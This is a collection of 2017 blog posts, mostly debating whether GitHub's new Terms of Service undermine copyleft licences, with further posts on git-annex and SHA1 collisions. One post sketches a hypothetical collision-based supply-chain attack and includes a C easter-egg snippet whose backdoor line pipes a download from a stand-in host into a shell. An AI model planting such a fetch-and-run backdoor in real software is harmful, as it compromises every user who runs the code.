On February 28th, GitHub published a brand new version of its Terms of Service (ToS). While the first draft announced earlier in February didn't generate much reaction, the new ToS raised concerns that they may break at least the spirit, if not the letter, of certain free-software licenses. Digging in further reveals that the situation is probably not as dire as some had feared. The first person to raise the alarm was probably Thorsten Glaser, a Debian developer, who stated that the "new GitHub Terms of Service require removing many Open Source works from it". His concerns are mainly about section D of the document, in particular section D.4 which states:
You grant us and our legal successors the right to store and display your Content and make incidental copies as necessary to render the Website and provide the Service.
Section D.5 then goes on to say:
[...] You grant each User of GitHub a nonexclusive, worldwide license to access your Content through the GitHub Service, and to use, display and perform your Content, and to reproduce your Content solely on GitHub as permitted through GitHub's functionality

ToS versus GPL The concern here is that the ToS bypass the normal provisions of licenses like the GPL. Indeed, copyleft licenses are based on copyright law which forbid users from doing anything with the content unless they comply with the license, which forces, among other things, "share alike" properties. By granting GitHub and its users rights to reproduce content without explicitly respecting the original license, the ToS may allow users to bypass the copyleft nature of the license. Indeed, as Joey Hess, author of git-annex, explained :
The new TOS is potentially very bad for copylefted Free Software. It potentially neuters it entirely, so GPL licensed software hosted on Github has an implicit BSD-like license
Hess has since removed all his content (mostly mirrors) from GitHub. Others disagree. In a well-reasoned blog post, Debian developer Jonathan McDowell explained the rationale behind the changes:
My reading of the GitHub changes is that they are driven by a desire to ensure that GitHub are legally covered for the things they need to do with your code in order to run their service.
This seems like a fair point to make: GitHub needs to protect its own rights to operate the service. McDowell then goes on to do a detailed rebuttal of the arguments made by Glaser, arguing specifically that section D.5 "does not grant [...] additional rights to reproduce outside of GitHub". However, specific problems arise when we consider that GitHub is a private corporation that users have no control over. The "Services" defined in the ToS explicitly "refers to the applications, software, products, and services provided by GitHub". The term "Services" is therefore not limited to the current set of services. This loophole may actually give GitHub the right to bypass certain provisions of licenses used on GitHub. As Hess detailed in a later blog post:
If Github tomorrow starts providing say, an App Store service, that necessarily involves distribution of software to others, and they put my software in it, would that be allowed by this or not? If that hypothetical Github App Store doesn't sell apps, but licenses access to them for money, would that be allowed under this license that they want to my software?
However, when asked on IRC, Bradley M. Kuhn of the Software Freedom Conservancy explained that "ultimately, failure to comply with a copyleft license is a copyright infringement" and that the ToS do outline a process to deal with such infringement. Some lawyers have also publicly expressed their disagreement with Glaser's assessment, with Richard Fontana from Red Hat saying that the analysis is "basically wrong". It all comes down to the intent of the ToS, as Kuhn (who is not a lawyer) explained:
any license can be abused or misused for an intent other than its original intent. It's why it matters to get every little detail right, and I hope Github will do that.
He went even further and said that "we should assume the ambiguity in their ToS as it stands is favorable to Free Software". The ToS are in effect since February 28th; users "can accept them by clicking the broadcast announcement on your dashboard or by continuing to use GitHub". The immediacy of the change is one of the reasons why certain people are rushing to remove content from GitHub: there are concerns that continuing to use the service may be interpreted as consent to bypass those licenses. Hess even hosted a separate copy of the ToS [PDF] for people to be able to read the document without implicitly consenting. It is, however, unclear how a user should remove their content from the GitHub servers without actually agreeing to the new ToS.

CLAs When I read the first draft, I initially thought there would be concerns about the mandatory Contributor License Agreement (CLA) in section D.5 of the draft:
[...] unless there is a Contributor License Agreement to the contrary, whenever you make a contribution to a repository containing notice of a license, you license your contribution under the same terms, and agree that you have the right to license your contribution under those terms.
I was concerned this would establish the controversial practice of forcing CLAs on every GitHub user. I managed to find a post from a lawyer, Kyle E. Mitchell, who commented on the draft and, specifically, on the CLA. He outlined issues with wording and definition problems in that section of the draft. In particular, he noted that "contributor license agreement is not a legal term of art, but an industry term" and "is a bit fuzzy". This was clarified in the final draft, in section D.6, by removing the use of the CLA term and by explicitly mentioning the widely accepted norm for licenses: "inbound=outbound". So it seems that section D.6 is not really a problem: contributors do not need to necessarily delegate copyright ownership (as some CLAs require) when they make a contribution, unless otherwise noted by a repository-specific CLA. An interesting concern he raised, however, was with how GitHub conducted the drafting process. A blog post announced the change on February 7th with a link to a form to provide feedback until the 21st, with a publishing deadline of February 28th. This gave little time for lawyers and developers to review the document and comment on it. Users then had to basically accept whatever came out of the process as-is. Unlike every software project hosted on GitHub, the ToS document is not part of a Git repository people can propose changes to or even collaboratively discuss. While Mitchell acknowledges that "GitHub are within their rights to update their terms, within very broad limits, more or less however they like, whenever they like", he sets higher standards for GitHub than for other corporations, considering the community it serves and the spirit it represents. He described the process as:
[...] consistent with the value of CYA, which is real, but not with the output-improving virtues of open process, which is also real, and a great deal more pleasant.
Mitchell also explained that, because of its position, GitHub can have a major impact on the free-software world.
And as the current forum of preference for a great many developers, the knock-on effects of their decisions throw big weight. While GitHub have the wheel and they ve certainly earned it for now they can do real damage.
In particular, there have been some concerns that the ToS change may be an attempt to further the already diminishing adoption of the GPL for free-software projects; on GitHub, the GPL has been surpassed by the MIT license. But Kuhn believes that attitudes at GitHub have begun changing:
GitHub historically had an anti-copyleft culture, which was created in large part by their former and now ousted CEO, Preston-Warner. However, recently, I've seen people at GitHub truly reach out to me and others in the copyleft community to learn more and open their minds. I thus have a hard time believing that there was some anti-copyleft conspiracy in this ToS change.

GitHub response However, it seems that GitHub has actually been proactive in reaching out to the free software community. Kuhn noted that GitHub contacted the Conservancy to get its advice on the ToS changes. While he still thinks GitHub should fix the ambiguities quickly, he also noted that those issues "impact pretty much any non-trivial Open Source and Free Software license", not just copylefted material. When reached for comments, a GitHub spokesperson said:
While we are confident that these Terms serve the best needs of the community, we take our users' feedback very seriously and we are looking closely at ways to address their concerns.
Regardless, free-software enthusiasts have other concerns than the new ToS if they wish to use GitHub. First and foremost, most of the software running GitHub is proprietary, including the JavaScript served to your web browser. GitHub also created a centralized service out of a decentralized tool (Git). It has become the largest code hosting service in the world after only a few years and may well have become a single point of failure for free software collaboration in a way we have never seen before. Outages and policy changes at GitHub can have a major impact on not only the free-software world, but also the larger computing world that relies on its services for daily operation. There are now free-software alternatives to GitHub. GitLab.com, for example, does not seem to have similar licensing issues in its ToS and GitLab itself is free software, although based on the controversial open core business model. The GitLab hosting service still needs to get better than its grade of "C" in the GNU Ethical Repository Criteria Evaluations (and it is being worked on); other services like GitHub and SourceForge score an "F". In the end, all this controversy might have been avoided if GitHub was generally more open about the ToS development process and gave more time for feedback and reviews by the community. Terms of service are notorious for being confusing and something of a legal gray area, especially for end users who generally click through without reading them. We should probably applaud the efforts made by GitHub to make its own ToS document more readable and hope that, with time, it will address the community's concerns.
Note: this article first appeared in the Linux Weekly News.

2 March 2017

Joey Hess: what I would ask my lawyers about the new Github TOS

The Internet saw Github's new TOS yesterday and collectively shrugged. That's weird.. I don't have any lawyers, but the way Github's new TOS is written, I feel I'd need to consult with lawyers to understand how it might affect the license of my software if I hosted it on Github. And the license of my software is important to me, because it is the legal framework within which my software lives or dies. If I didn't care about my software, I'd be able to shrug this off, but since I do it seems very important indeed, and not worth taking risks with. If I were looking over the TOS with my lawyers, I'd ask these questions...
4 License Grant to Us
This seems to be saying that I'm granting an additional license to my software to Github. Is that right or does "license grant" have some other legal meaning? If the Free Software license I've already licensed my software under allows for everything in this "License Grant to Us", would that be sufficient, or would my software still be licenced under two different licences? There are violations of the GPL that can revoke someone's access to software under that license. Suppose that Github took such an action with my software, and their GPL license was revoked. Would they still have a license to my software under this "License Grant to Us" or not? "Us" is actually defined earlier as "GitHub, Inc., as well as our affiliates, directors, subsidiaries, contractors, licensors, officers, agents, and employees". Does this mean that if someone say, does some brief contracting with Github, that they get my software under this license? Would they still have access to it under that license when the contract work was over? What does "affiliates" mean? Might it include other companies? Is it even legal for a TOS to require a license grant? Don't license grants normally involve an intentional action on the licensor's part, like signing a contract or writing a license down? All I did was loaded a webpage in a browser and saw on the page that by loading it, they say I've accepted the TOS. (I then set about removing everything from Github.) Github's old TOS was not structured as a license grant. What reasons might they have for structuring this TOS in such a way? Am I asking too many questions only 4 words into this thing? Or not enough?
Your Content belongs to you, and you are responsible for Content you post even if it does not belong to you. However, we need the legal right to do things like host it, publish it, and share it. You grant us and our legal successors the right to store and display your Content and make incidental copies as necessary to render the Website and provide the Service.
If this is a software license, the wording seems rather vague compared with other software licenses I've read. How much wiggle room is built into that wording? What are the chances that, if we had a dispute and this came before a judge, that Github's laywers would be able to find a creative reading of this that makes "do things like" include whatever they want? Suppose that my software is javascript code or gets compiled to javascript code. Would this let Github serve up the javascript code for their users to run as part of the process of rendering their website?
That means you're giving us the right to do things like reproduce your content (so we can do things like copy it to our database and make backups); display it (so we can do things like show it to you and other users); modify it (so our server can do things like parse it into a search index); distribute it (so we can do things like share it with other users); and perform it (in case your content is something like music or video).
Suppose that Github modified my software, does not distribute the modified version, but converts it to javascipt code and distributes that to their users to run as part of the process of rendering their website. If my software is AGPL licensed, they would be in violation of that license, but doesn't this additional license allow them to modify and distribute my software in such a way?
This license does not grant GitHub the right to sell your Content or otherwise distribute it outside of our Service.
I see that "Service" is defined as "the applications, software, products, and services provided by GitHub". Does that mean at the time I accept the TOS, or at any point in the future? If Github tomorrow starts providing say, an App Store service, that necessarily involves distribution of software to others, and they put my software in it, would that be allowed by this or not? If that hypothetical Github App Store doesn't sell apps, but licenses access to them for money, would that be allowed under this license that they want to my software?
5 License Grant to Other Users Any Content you post publicly, including issues, comments, and contributions to other Users' repositories, may be viewed by others. By setting your repositories to be viewed publicly, you agree to allow others to view and "fork" your repositories (this means that others may make their own copies of your Content in repositories they control).
Let's say that company Foo does something with my software that violates its GPL license and the license is revoked. So they no longer are allowed to copy my software under the GPL, but it's there on Github. Does this "License Grant to Other Users" give them a different license under which they can still copy my software? The word "fork" has a particular meaning on Github, which often includes modification of the software in a repository. Does this mean that other users could modify my software, even if its regular license didn't allow them to modify it or had been revoked? How would this use of a platform-specific term "fork" be interpreted in this license if it was being analized in a courtroom?
If you set your pages and repositories to be viewed publicly, you grant each User of GitHub a nonexclusive, worldwide license to access your Content through the GitHub Service, and to use, display and perform your Content, and to reproduce your Content solely on GitHub as permitted through GitHub's functionality. You may grant further rights if you adopt a license.
This paragraph seems entirely innocious. So, what does your keen lawyer mind see in it that I don't? How sure are you about your answers to all this? We're fairly sure we know how well the GPL holds up in court; how well would your interpretation of all this hold up? What questions have I forgotten to ask?
And finally, the last question I'd be asking my lawyers: What's your bill come to? That much? Is using Github worth that much to me?

Jonathan McDowell: Rational thoughts on the GitHub ToS change

I woke this morning to Thorsten claiming the new GitHub Terms of Service could require the removal of Free software projects from it. This was followed by joeyh removing everything from github. I hadn t actually been paying attention, so I went looking for some sort of summary of whether I should be worried and ended up reading the actual ToS instead. TL;DR version: No, I m not worried and I don t think you should be either. First, a disclaimer. I m not a lawyer. I have some legal training, but none of what I m about to say is legal advice. If you re really worried about the changes then you should engage the services of a professional. The gist of the concerns around GitHub s changes are that they potentially circumvent any license you have applied to your code, either converting GPL licensed software to BSD style (and thus permitting redistribution of binary forms without source) or making it illegal to host software under certain Free software licenses on GitHub due to being unable to meet the requirements of those licenses as a result of GitHub s ToS. My reading of the GitHub changes is that they are driven by a desire to ensure that GitHub are legally covered for the things they need to do with your code in order to run their service. There are sadly too many people who upload code there without a license, meaning that technically no one can do anything with it. Don t do this people; make sure that any project you put on GitHub has some sort of license attached to it (don t write your own - it s highly likely one of Apache/BSD/GPL will suit your needs) so people know whether they can make use of it or not. I don t care is not a valid reason not to do this. Section D, relating to user generated content, is the one causing the problems. It s possibly easiest to walk through each subsection in order. D1 says GitHub don t take any responsibility for your content; you make it, you re responsible for it, they re not accepting any blame for harm your content does nor for anything any member of the public might do with content you ve put on GitHub. This seems uncontentious. D2 reaffirms your ownership of any content you create, and requires you to only post 3rd party content to GitHub that you have appropriate rights to. So I can t, for example, upload a copy of Friday by Rebecca Black. Thorsten has some problems with D3, where GitHub reserve the right to remove content that violates their terms or policies. He argues this could cause issues with licenses that require unmodified source code. This seems to be alarmist, and also applies to any random software mirror. The intent of such licenses is in general to ensure that the pristine source code is clearly separate from 3rd party modifications. Removal of content that infringes GitHub s T&Cs is not going to cause an issue. D4 is a license grant to GitHub, and I think forms part of joeyh s problems with the changes. It affirms the content belongs to the user, but grants rights to GitHub to store and display the content, as well as make copies such as necessary to provide the GitHub service. They explicitly state that no right is granted to sell the content at all or to distribute the content outside of providing the GitHub service. This term would seem to be the minimum necessary for GitHub to ensure they are allowed to provide code uploaded to them for download, and provide their web interface. If you ve actually put a Free license on your code then this isn t necessary, but from GitHub s point of view I can understand wanting to make it explicit that they need these rights to be granted. I don t believe it provides a method of subverting the licensing intent of Free software authors. D5 provides more concern to Thorsten. It seems he believes that the ability to fork code on GitHub provides a mechanism to circumvent copyleft licenses. I don t agree. The second paragraph of this subsection limits the license granted to the user to be the ability to reproduce the content on GitHub - it does not grant them additional rights to reproduce outside of GitHub. These rights, to my eye, enable the forking and viewing of content within GitHub but say nothing about my rights to check code out and ignore the author s upstream license. D6 clarifies that if you submit content to a GitHub repo that features a license you are licensing your contribution under these terms, assuming you have no other agreement in place. This looks to be something that benefits projects on GitHub receiving contributions from users there; it s an explicit statement that such contributions are under the project license. D7 confirms the retention of moral rights by the content owner, but states they are waived purely for the purposes of enabling GitHub to provide service, as stated under D4. In particular this right is revocable so in the event they do something you don t like you can instantly remove all of their rights. Thorsten is more worried about the ability to remove attribution and thus breach CC-BY or some BSD licenses, but GitHub s whole model is providing attribution for changesets and tracking such changes over time, so it s hard to understand exactly where the service falls down on ensuring the provenance of content is clear. There are reasons to be wary of GitHub (they ve taken a decentralised revision control system and made a business model around being a centralised implementation of it, and they store additional metadata such as PRs that aren t as easily extracted), but I don t see any indication that the most recent changes to their Terms of Service are something to worry about. The intent is clearly to provide GitHub with the legal basis they need to provide their service, rather than to provide a means for them to subvert the license intent of any Free software uploaded.

1 March 2017

Joey Hess: removing everything from github

Github recently drafted an update to their Terms Of Service. The new TOS is potentially very bad for copylefted Free Software. It potentially neuters it entirely, so GPL licensed software hosted on Github has an implicit BSD-like license. I'll leave the full analysis to the lawyers, but see Thorsten's analysis. I contacted Github about this weeks ago, and received only an anodyne response. The Free Software Foundation was also talking with them about it. It seems that Github doesn't care or has some reason to want to effectively neuter copyleft software licenses. The possibility that a Github TOS change could force a change to the license of your software hosted there, and that it's complicated enough that I'd have to hire a lawyer to know for sure, makes Github not worth bothering to use. Github's value proposition was never very high for me, and went negative now. I am deleting my repositories from Github at this time. If you used the Github mirrors for git-annex, propellor, ikiwiki, etckeeper, myrepos, click on the links for the non-Github repos (git.joeyh.name also has mirrors). Also, github-backup has a new website and repository off of github. (There's an oncoming severe weather event here, so it may take some time before I get everything deleted and cleaned up.) [Some commits to git-annex were pushed to Github this morning by an automated system, but I had NOT accepted their new TOS at that point, and explicitly do NOT give Github or anyone any rights to git-annex not granted by its GPL and AGPL licenses.] See also: PDF of Github TOS that can be read without being forced to first accept Github's TOS

Thorsten Glaser: New GitHub Terms of Service r e q u i r e removing many Open Source works from it

Please use the correct (perma)link to bookmark this article, not the page listing all wlog entries of the last decade. Thank you.</update> Some updates inline and at the bottom. The new Terms of Service of GitHub became effective today, which is quite problematic there was a review phase, but my reviews pointing out the problems were not answered, and, while the language is somewhat changed from the draft, they became effective immediately. Now, the new ToS are not so bad that one immediately must stop using their service for disagreement, but it s important that certain content may no longer legally be pushed to GitHub. I ll try to explain which is affected, and why. I m mostly working my way backwards through section D, as that s where the problems I identified lie, and because this is from easier to harder. Note that using a private repository does not help, as the same terms apply. Anything requiring attribution (e.g. CC-BY, but also BSD, ) Section D.7 requires the person uploading content to waive any and all attribution rights. Ostensibly to allow basic functions like search to work , which I can even believe, but, for a work the uploader did not create completely by themselves, they can t grant this licence. The CC licences are notably bad because they don t permit sublicencing, but even so, anything requiring attribution can, in almost all cases, not written or otherwise, created or uploaded by our Users . This is fact, and the exceptions are few. Anything putting conditions on the right to use, display and perform the work and, worse, reproduce (all Copyleft) Section D.5 requires the uploader to grant all other GitHub users Note that section D.4 is similar, but granting the licence to GitHub (and their successors); while this is worded much more friendly than in the draft, this fact only makes it harder to see if it affects works in a similar way. But that doesn t matter since D.5 is clear enough. (This doesn t mean it s not a problem, just that I don t want to go there and analyse D.4 as D.5 points out the same problems but is easier.) This means that any and all content under copyleft licences is also no longer welcome on GitHub. Anything requiring integrity of the author s source (e.g. LPPL) Some licences are famous for requiring people to keep the original intact while permitting patches to be piled on top; this is actually permissible for Open Source, even though annoying, and the most common LaTeX licence is rather close to that. Section D.3 says any (partial) content can be removed though keeping a PKZIP archive of the original is a likely workaround. Affected licences Anything copyleft (GPL, AGPL, LGPL, CC-*-SA) or requiring attribution (CC-BY-*, but also 4-clause BSD, Apache 2 with NOTICE text file, ) are affected. BSD-style licences without advertising clause (MIT/Expat, MirOS, etc.) are probably not affected if GitHub doesn t go too far and dissociates excerpts from their context and legal info, but then nobody would be able to distribute it, so that d be useless. But what if I just fork something under such a licence? Only continuing to use GitHub constitutes accepting the new terms. This means that repositories from people who last used GitHub before March 2017 are excluded. Even then, the new terms likely only apply to content uploaded in March 2017 or later (note that git commit dates are unreliable, you have to actually check whether the contribution dates March 2017 or later). And then, most people are likely unaware of the new terms. If they upload content they themselves don t have the appropriate rights (waivers to attribution and copyleft/share-alike clauses), it s plain illegal and also makes your upload of them or a derivate thereof no more legal. Granted, people who, in full knowledge of the new ToS, share any User-Generated Content with GitHub on or after 1 March, 2017, and actually have the appropriate rights to do that, can do that; and if you encounter such a repository, you can fork, modify and upload that iff you also waive attribution and copyleft/share-alike rights for your portion of the upload. But especially in the beginning these will be few and far between (even more so taking into account that GitHub is, legally spoken, a mess, and they don t even care about hosting only OSS / Free works). Conclusion (Fazit) I ll be starting to remove any such content of mine, such as the source code mirrors of jupp, which is under the GNU GPLv1, now and will be requesting people who forked such repositories on GitHub to also remove them. This is not something I like to do but something I am required to do in order to comply with the licence granted to me by my upstream. Anything you ve found contributed by me in the meantime is up for review; ping me if I forgot something. (mksh is likely safe, even if I hereby remind you that the attribution requirement of the BSD-style licences still applies outside of GitHub.) (Pet peeve: why can t I adopt a licence with British spelling? They seem to require oversea barbarian spelling.) The others Atlassian Bitbucket has similar terms (even worse actually; I looked at them to see whether I could mirror mksh there, and turns out, I can t if I don t want to lose most of what few rights I retain when publishing under a permissive licence). Gitlab seems to not have such, but requires you to indemnify them YMMV. I think I ll self-host the removed content. And now? I m in contact with someone from GitHub Legal (not explicitly in the official capacity though) and will try to explain the sheer magnitude of the problem and ways to solve this (leaving the technical issues to technical solutions and requiring legal solutions only where strictly necessary), but for now, the ToS are enacted (another point of my criticism of this move) and thus, the aforementioned works must go off GitHub right now. That s not to say they may not come back later once this all has been addressed, if it will be addressed to allow that. The new ToS do have some good; for example, the old ToS said you allow every GitHub user to fork your repositories without ever specifying what that means. It s just that the people over at GitHub need to understand that, both legally and technically , any and all OSS licences grant enough to run a hosting platform already , and separate explicit grants are only needed if a repository contains content not under an OSI/OKFN/Copyfree/FSF/DFSG-free licence. I have been told that these are important issues and been thanked for my feedback; we ll see what comes from this. maybe with a little more effort on the coders side All licences on one of those lists or conformant to the DFSG, OSD or OKD should do . e.g. when displaying search results, add a note this is an excerpt, click HERE to get to the original work in its context, with licence and attribution where HERE is a backlink to the file in the repository It is understood those organisations never un-approve any licence that rightfully conforms to those definitions (also in cases like a grant saying just use any OSS licence which is occasionally used) Update: In the meantime, joeyh has written not one but two insightful articles (although I disagree in some details; the new licence is only to GitHub users (D.5) and GitHub (D.4) and only within their system, so, while uploaders would violate the ToS (they cannot grant the licence) and (probably) the upstream-granted copyleft licence, this would not mean that everyone else wasn t bound by the copyleft licence in, well, enough cases to count (yes it s possible to construct situations in which this hurts the copyleft fraction, but no, they re nowhere near 100%).

27 February 2017

Joey Hess: making git-annex secure in the face of SHA1 collisions

git-annex has never used SHA1 by default. But, there are concerns about SHA1 collisions being used to exploit git repositories in various ways. Since git-annex builds on top of git, it inherits its foundational SHA1 weaknesses. Or does it? Interestingly, when I dug into the details, I found a way to make git-annex repositories secure from SHA1 collision attacks, as long as signed commits are used (and verified). When git commits are signed (and verified), SHA1 collisions in commits are not a problem. And there seems to be no way to generate usefully colliding git tree objects (unless they contain really ugly binary filenames). That leaves blob objects, and when using git-annex, those are git-annex key names, which can be secured from being a vector for SHA1 collision attacks. This needed some work on git-annex, which is now done, so look for a release in the next day or two that hardens it against SHA1 collision attacks. For details about how to use it, and more about why it avoids git's SHA1 weaknesses, see https://git-annex.branchable.com/tips/using_signed_git_commits/. My advice is, if you are using a git repository to publish or collaborate on binary files, in which it's easy to hide SHA1 collisions, you should switch to using git-annex and signed commits. PS: Of course, verifying gpg signatures on signed commits adds some complexity and won't always be done. It turns out that the current SHA1 known-prefix collision attack cannot be usefully used to generate colliding commit objects, although a future common-prefix collision attack might. So, even if users don't verify signed commits, I believe that repositories using git-annex for binary files will be as secure as git repositories containing binary files used to be. How-ever secure that might be..

24 February 2017

Joey Hess: SHA1 collision via ASCII art

Happy SHA1 collision day everybody! If you extract the differences between the good.pdf and bad.pdf attached to the paper, you'll find it all comes down to a small ~128 byte chunk of random-looking binary data that varies between the files. The SHA1 attack announced today is a common-prefix attack. The common prefix that we will use is this:
/* ASCII art for easter egg. */
char *amazing_ascii_art="\
(To be extra sneaky, you can add a git blob object header to that prefix before calculating the collisions. Doing so will make the SHA1 that git generates when checking in the colliding file be the thing that collides. This makes it easier to swap in the bad file later on, because you can publish a git repository containing it, and trick people into using that repository. ("I put a mirror on github!") The developers of the program will have the good version in their repositories and not notice that users are getting the bad version.) Suppose that the attack was able to find collisions using only printable ASCII characters when calculating those chunks. The "good" data chunk might then look like this:
7*yLN#!NOKj@ FPKW".<i+sOCsx9QiFO0UR3ES*Eh]g6r/anP=bZ6&IJ#cOS.w;oJkVW"<*.!,qjRht?+^=^/Q*Is0K>6F)fc(ZS5cO#"aEavPLI[oI(kF_l!V6ycArQ
And the "bad" data chunk like this:
9xiV^Ksn=<A!<^ l4~ uY2x8krnY@JA<<FA0Z+Fw!;UqC(1_ZA^fu#e Z>w_/S?.5q^!WY7VE>gXl.M@d6]a*jW1eY(Qw(r5(rW8G)?Bt3UT4fas5nphxWPFFLXxS/xh
Now we need an ASCII artist. This could be a human, or it could be a machine. The artist needs to make an ASCII art where the first line is the good chunk, and the rest of the lines obfuscate how random the first line is. Quick demo from a not very artistic ASCII artist, of the first 10th of such a picture based on the "good" line above:
7*yLN#!NOK
3*\LN'\NO@
3*/LN  \.A
5*\LN   \.
>=======:)
5*\7N   /.
3*/7N  /.V
3*\7N'/NO@
7*y7N#!NOX
Now, take your ASCII art and embed it in a multiline quote in a C source file, like this:
/* ASCII art for easter egg. */
char *amazing_ascii_art="\
7*yLN#!NOK \
3*\\LN'\\NO@ \
3*/LN  \\.A \ 
5*\\LN   \\. \
>=======:) \
5*\\7N   /. \
3*/7N  /.V \
3*\\7N'/NO@ \
7*y7N#!NOX";
/* We had to escape backslashes above to make it a valid C string.
 * Run program with --easter-egg to see it in all its glory.
 */
/* Call this at the top of main() */
check_display_easter_egg (char **argv)  
    if (strcmp(argv[1], "--easter-egg") == 0)
        printf(amazing_ascii_art);
    if (amazing_ascii_art[0] == "9")
        system("curl http://evil.url   sh");
 
Now, you need a C ofuscation person, to make that backdoor a little less obvious. (Hint: Add code to to fix the newlines, paint additional ASCII sprites over top of the static art, etc, add animations, and bury the shellcode in there.) After a little work, you'll have a C file that any project would like to add, to be able to display a great easter egg ASCII art. Submit it to a project. Submit different versions of it to 100 projects! Everything after line 3 can be edited to make lots of different versions targeting different programs. Once a project contains the first 3 lines of the file, followed by anything at all, it contains a SHA1 collision, from which you can generate the bad version by swapping in the bad data chuck. You can then replace the good file with the bad version here and there, and noone will be the wiser (except the easter egg will display the "bad" first line before it roots them). Now, how much more expensive would this be than today's SHA1 attack? It needs a way to generate collisions using only printable ASCII. Whether that is feasible depends on the implementation details of the SHA1 attack, and I don't really know. I should stop writing this blog post and read the rest of the paper. You can pick either of these two lessons to take away:
  1. ASCII art in code is evil and unsafe. Avoid it at any cost. apt-get moo
  2. Git's security is getting broken to the point that ASCII art (and a few hundred thousand dollars) is enough to defeat it.

My work today investigating ways to apply the SHA1 collision to git repos (not limited to this blog post) was sponsored by Thomas Hochstein on Patreon.

22 February 2017

Joey Hess: early spring

Sun is setting after 7 (in the JEST TZ); it's early spring. Batteries are generally staying above 11 volts, so it's time to work on the porch (on warmer days), running the inverter and spinning up disc drives that have been mostly off since fall. Back to leaving the router on overnight so my laptop can sync up before I wake up. Not enough power yet to run electric lights all evening, and there's still a risk of a cloudy week interrupting the climb back up to plentiful power. It's happened to me a couple times before. Also, turned out that both of my laptop DC-DC power supplies developed partial shorts in their cords around the same time. So at first I thought it was some problem with the batteries or laptop, but eventually figured it out and got them replaced. (This may have contributed the the cliff earier; seemed to be worst when house voltage was low.) Soon, 6 months of more power than I can use.. Previously: battery bank refresh late summer the cliff

17 February 2017

Joey Hess: Presenting at LibrePlanet 2017

I've gotten in the habit of going to the FSF's LibrePlanet conference in Boston. It's a very special conference, much wider ranging than a typical technology conference, solidly grounded in software freedom, and full of extraordinary people. (And the only conference I've ever taken my Mom to!) After attending for four years, I finally thought it was time to perhaps speak at it.
Four keynote speakers will anchor the event. Kade Crockford, director of the Technology for Liberty program of the American Civil Liberties Union of Massachusetts, will kick things off on Saturday morning by sharing how technologists can enlist in the growing fight for civil liberties. On Saturday night, Free Software Foundation president Richard Stallman will present the Free Software Awards and discuss pressing threats and important opportunities for software freedom. Day two will begin with Cory Doctorow, science fiction author and special consultant to the Electronic Frontier Foundation, revealing how to eradicate all Digital Restrictions Management (DRM) in a decade. The conference will draw to a close with Sumana Harihareswara, leader, speaker, and advocate for free software and communities, giving a talk entitled "Lessons, Myths, and Lenses: What I Wish I'd Known in 1998." That's not all. We'll hear about the GNU philosophy from Marianne Corvellec of the French free software organization April, Joey Hess will touch on encryption with a talk about backing up your GPG keys, and Denver Gingerich will update us on a crucial free software need: the mobile phone. Others will look at ways to grow the free software movement: through cross-pollination with other activist movements, removal of barriers to free software use and contribution, and new ideas for free software as paid work.
-- Here's a sneak peek at LibrePlanet 2017: Register today! I'll be giving some varient of the keysafe talk from Linux.Conf.Au. By the way, videos of my keysafe and propellor talks at Linux.Conf.Au are now available, see the talks page.

Next.

Previous.